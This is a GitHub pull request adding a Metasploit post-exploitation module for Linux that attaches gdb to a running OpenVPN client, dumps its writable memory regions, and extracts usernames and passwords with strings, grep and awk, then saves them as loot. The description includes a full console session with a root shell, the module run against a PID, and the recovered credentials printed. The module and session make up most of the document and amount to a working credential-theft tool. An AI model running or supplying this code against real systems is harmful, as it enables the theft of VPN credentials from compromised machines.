### PR TITLE
Add OpenVPN Grab Credentials - Post Module

### DIFF
--- a/modules/post/linux/gather/openvpn_credentials.rb
+++ b/modules/post/linux/gather/openvpn_credentials.rb
@@ -62,6 +62,7 @@ class Metasploit4 < Msf::Post
       vprint_good('Succesfully dump.')
     else
       print_warning('Could not dump process.')
+      return
     end
 
     strings = cmd_exec("/usr/bin/strings #{tmp_path}*.dump | /bin/grep -B2 KnOQ  | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk '{print \"User: \"$1\"\\nPass: \"$2}'")
@@ -71,6 +72,7 @@ class Metasploit4 < Msf::Post
       vprint_good('Removing temp files successfully.')
     else
       print_warning('Could not remove dumped files.')
+      return
     end
 
     fail_with(Failure::BadConfig, 'No credentials. You can check if the PID is correct.') if strings.empty?

--- a/modules/post/linux/gather/openvpn_credentials.rb
+++ b/modules/post/linux/gather/openvpn_credentials.rb
@@ -1,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'OpenVPN Gather Credentials',
+      'Description'   => %q{
+        This module grab OpenVPN credentials from a running process
+        in Linux.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'rvrsh3ll', # Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>', # Metasploit Module
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter'],
+      'References'    => [
+        ['URL', 'https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh']
+      ]
+    ))
+
+    register_options(
+      [
+        OptInt.new('PID', [true, 'Process IDentifier to OpenVPN client.'])
+      ], self.class
+    )
+  end
+
+  def pid
+    datastore['PID']
+  end
+
+  def run
+    user = cmd_exec('/usr/bin/whoami')
+    print_good("Module running as \"#{user}\" user")
+
+    unless is_root? && user == 'root'
+      print_error('This module requires root permissions.')
+      return
+    end
+
+    cmd_exec('/bin/grep rw-p /proc/'"#{pid}"'/maps | sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | while read start stop; do /usr/bin/gdb --batch-silent --silent --pid '"#{pid}"' -ex "dump memory '"#{pid}"'-$start-$stop.dump 0x$start 0x$stop"; done')
+    strings = cmd_exec('/usr/bin/strings *.dump | /bin/grep -B2 KnOQ  | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk \'{print "User: "$1"\nPass: "$2}\'')
+    cmd_exec('/bin/rm *.dump --force')
+
+    if strings.empty?
+      print_error('No credentials. You can check if the PID is correct.')
+      return
+    end
+
+    vprint_good("OpenVPN Credentials:\n#{strings}")
+
+    p = store_loot(
+      'openvpn.grab',
+      'text/plain',
+      session,
+      strings,
+      nil
+    )
+    print_status("OpenVPN Credentials stored in #{p}")
+  end
+end

--- a/modules/post/linux/gather/openvpn_credentials.rb
+++ b/modules/post/linux/gather/openvpn_credentials.rb
@@ -47,7 +47,7 @@ class Metasploit4 < Msf::Post
     user = cmd_exec('/usr/bin/whoami')
     print_good("Module running as \"#{user}\" user")
 
-    unless is_root? && user == 'root'
+    unless is_root?
       print_error('This module requires root permissions.')
       return
     end

--- a/modules/post/linux/gather/openvpn_credentials.rb
+++ b/modules/post/linux/gather/openvpn_credentials.rb
@@ -71,8 +71,7 @@ class Metasploit4 < Msf::Post
     if deldump.chomp.to_i == 0
       vprint_good('Removing temp files successfully.')
     else
-      print_warning('Could not remove dumped files.')
-      return
+      print_warning('Could not remove dumped files. Remove manually.')
     end
 
     fail_with(Failure::BadConfig, 'No credentials. You can check if the PID is correct.') if strings.empty?


### PR DESCRIPTION
#### Add VPN Grab Credentials

  This module grab VPN credentials from a running vpn process in Linux.

  References:
    https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh
#### Test environment:

  OpenVPN
    http://linuxlove.eu/howto-setup-openvpn-on-ubuntu-15-04/
#### Softwares

  OpenVPN</br>
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):
##### OpenVPN

```
msfdevel 192.168.0.4 shell[s]:0 job[s]:0 msf> exploit(handler)  exploit 

[*] Starting the payload handler...
[*] Started bind handler
[*] Command shell session 3 opened (192.168.0.4:34386 -> 192.168.0.4:4444) at 2015-10-19 23:22:41 -0200

id
uid=0(root) gid=0(root) groups=0(root)
ps aux | grep openvpn
root      4935  0.0  0.0   6792  1948 pts/13   S+   23:21   0:00 sudo openvpn --config vpnbook-euro1-tcp443.ovpn
root      4936  0.0  0.1   5564  2808 pts/13   S+   23:21   0:00 openvpn --config vpnbook-euro1-tcp443.ovpn
root      5261  0.0  0.0   4676   820 pts/0    S+   23:23   0:00 grep openvpn
espreto  28130  0.0  1.0 275532 20720 ?        Ssl  22:39   0:02 gvim modules/post/linux/gather/openvpn_credentials.rb
^Z
Background session 3? [y/N]  y
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> exploit(handler)  use post/linux/gather/openvpn_credentials 
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set SESSION 3
SESSION => 3
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set PID 4936
PID => 4936
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  run

[+] Module running as "root" user
[*] OpenVPN Credentials stored in /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt
[*] Post module execution completed
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  cat /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt
[*] exec: cat /home/espreto/.msf4/loot/20151019232421_default_192.168.0.4_openvpn.creds_333181.txt

User: vpnbook
Pass: 8uWrepAw
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  set VERBOSE true
VERBOSE => false
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)  run

[+] Module running as "root" user
[+] OpenVPN Credentials:
User: vpnbook
Pass: 8uWrepAw
[*] OpenVPN Credentials stored in /home/espreto/.msf4/loot/20151019232835_default_192.168.0.4_openvpn.creds_761404.txt
[*] Post module execution completed
msfdevel 192.168.0.4 shell[s]:1 job[s]:0 msf> post(openvpn_credentials)
```
